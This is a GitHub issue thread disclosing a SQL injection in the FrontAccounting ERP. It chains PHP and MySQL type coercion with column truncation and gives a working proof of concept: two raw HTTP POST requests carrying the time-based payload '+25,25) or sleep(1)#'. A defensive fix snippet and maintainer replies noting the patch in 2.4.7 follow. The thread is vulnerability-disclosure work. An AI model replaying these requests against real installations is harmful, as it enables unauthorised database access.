
SQL Injection #38

Closed
Ginnz opened this issue Jan 7, 2019 · 2 comments

Comments


Ginnz commented Jan 7, 2019

Sorry, this is my first time chatting with people in English.

FrontAccounting uses the function db_escape() to escape values, but some variables do not go through db_escape().
Environment: docker mattrayner/lamp:latest-1604

0x00 Description

includes/db/class.reflines_db.inc:156
If I set the parameter $reference to something like `XXXXXX\`, the single quote gets escaped, and I can inject in the parameter $type.
[screenshot]
includes/references.inc:365
[screenshot]
admin/db/voiding_db.inc:127
[screenshot]
admin/void_transaction.php:316
[screenshot]
admin/void_transaction.php:352
[screenshot]
So the parameter $type can be controlled.
How about the parameter $reference?
[screenshot]
[screenshot]
get_systype_db_info()
[screenshot]
After that I found some insert statements for the table grn_batch.
purchasing/includes/db/grn_db.inc:170
[screenshot]
purchasing/includes/db/grn_db.inc:99
[screenshot]
purchasing/po_receive_items.php:254
[screenshot]
[screenshot]
So the parameter $reference can be controlled.

0x01 Bypass:

1. PHP
   `switch ($type)`
   For the variable $type here, `'25'` is the same as `'+25dasdsadasda'`.
   [screenshot]
   [screenshot]
2. MySQL
   Converting a string into an integer has some problems in MySQL.
   [screenshot]
   `'25' = '25dasdasdasd' = '+25dasdasdasd'`
   [screenshot]
   A string and an integer can be added.
3. MySQL has the SQL truncation problem, so that `\` can be truncated.

0x02 POC:

Settings such as `001/2018\` will report an error, but `001/2018\` will not. I noticed that reference is 60 bytes, so I set the payload to 61 bytes, like `001100422222222222222222222201700422222222222222212222/2018\\`. It is `001100422222222222222222222201700422222222222222212222/2018\` in the database.

I am using po_entry_items.php, not the po_receive_items.php found above.
[screenshot]

```http
POST /FA1/purchasing/po_entry_items.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1/purchasing/po_entry_items.php?NewGRN=Yes
Content-Type: application/octet-stream
Content-Length: 343
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=6qb35uj2b4sv26em7d6f5i7qv3; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=i96j3h5r6hl16smme7tl0t3ie3

supplier_id=1&OrderDate=12/31/2018&ref=001100422222222222222222222201700422222222222222212222/2018\\&supp_ref=&dimension=0&StkLocation=DEF&delivery_address=N/A&_stock_id_edit=102&stock_id=101&qty=1&price=200.00&Comments=&Commit=Process%20GRN&_focus=supplier_id&_modified=0&_confirmed=&_token=YNHuXfwn6xEZH7dUBa196wxx&_random=1078360.0430200463
```

Database:
[screenshots]

```http
POST /FA1//admin/void_transaction.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1//admin/void_transaction.php
Content-Type: application/octet-stream
Content-Length: 261
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=3h40pcjb2t5apf0rlcblj1ahv6; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=1e2v29h21gv4efc5g2fr0fs0q0

filterType=%2b25%2c25)%20or%20sleep(1)%23&FromTransNo=1&ToTransNo=999999&date_=12/31/2018&memo_=&trans_no=3&selected_id=3&ConfirmVoiding=%u7EE7%u7EED%u8FDB%u884C&_focus=filterType&_modified=0&_confirmed=&_token=p6ySb5gc0z5JLK4DvaC9owxx&_random=578301.3136013072
```

The final execution of the SQL statement is like this:

```sql
SELECT * FROM 0_reflines WHERE trans_type='+25,25) or sleep(1)#' AND CHAR_LENGTH(`prefix`) AND LEFT('20170042222222222222222222220170042222222222222221222222221\', CHAR_LENGTH(`prefix`)) = `prefix` UNION SELECT * FROM 0_reflines WHERE trans_type='+25,25) and sleep(1)#' AND `prefix`=''
```
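As an added, defender-side example (not FrontAccounting's code or the reporter's), one way to close both gaps the report chains together: a strict integer check for $type, a length check on $reference before it is written, and a bound lookup on the read path. It assumes a mysqli connection; the function and constant names are assumptions for this example only.

```php
<?php
// Added, defender-side example (not FrontAccounting's code or the reporter's):
// closing the two gaps the report chains together, a loosely compared $type and
// a stored $reference that is later spliced into SQL after MySQL truncated it.
// valid_trans_type, normalize_reference, find_reflines and REFERENCE_MAX are
// names assumed for this example only.

// Accept only a plain integer for $type. In PHP 7, switch ($type) with integer
// cases matched '+25dasdsadasda' because '+25dasdsadasda' == 25 was true;
// PHP 8 changed that, but an explicit check removes the version dependency.
function valid_trans_type($type): ?int
{
    if (!is_int($type) && !is_string($type)) {
        return null;
    }
    $n = filter_var($type, FILTER_VALIDATE_INT); // rejects '+25x', '25,25) or ...'
    return $n === false ? null : $n;
}

const REFERENCE_MAX = 60; // width of the reference column named in the report

// Enforce the column width in PHP before the INSERT (grn_batch in the report),
// so MySQL never silently truncates and a trailing backslash cannot be left
// behind. Strict mode on the server turns such truncation into an error too.
function normalize_reference(string $ref): string
{
    if (strlen($ref) > REFERENCE_MAX) {
        throw new InvalidArgumentException('reference longer than ' . REFERENCE_MAX . ' bytes');
    }
    return $ref;
}

// On the read path, treat the stored reference as user data: bind it instead of
// interpolating it, mirroring the reflines lookup in the report's final query.
function find_reflines(mysqli $db, $type, string $ref): ?array
{
    $t = valid_trans_type($type);
    if ($t === null) {
        return null; // refuse, rather than let MySQL coerce '+25,25) or ...' to 25
    }
    $stmt = $db->prepare(
        'SELECT * FROM 0_reflines WHERE trans_type = ? AND CHAR_LENGTH(`prefix`) '
        . 'AND LEFT(?, CHAR_LENGTH(`prefix`)) = `prefix`'
    );
    $stmt->bind_param('is', $t, $ref);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}
```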
@itronics (Contributor)

Thank you very much for this deep analysis. I have just pushed fix to the repo together with changes related to strict mode.

@FrontAccountingERP (Owner)

This issue was finally fixed in 2.4.7.
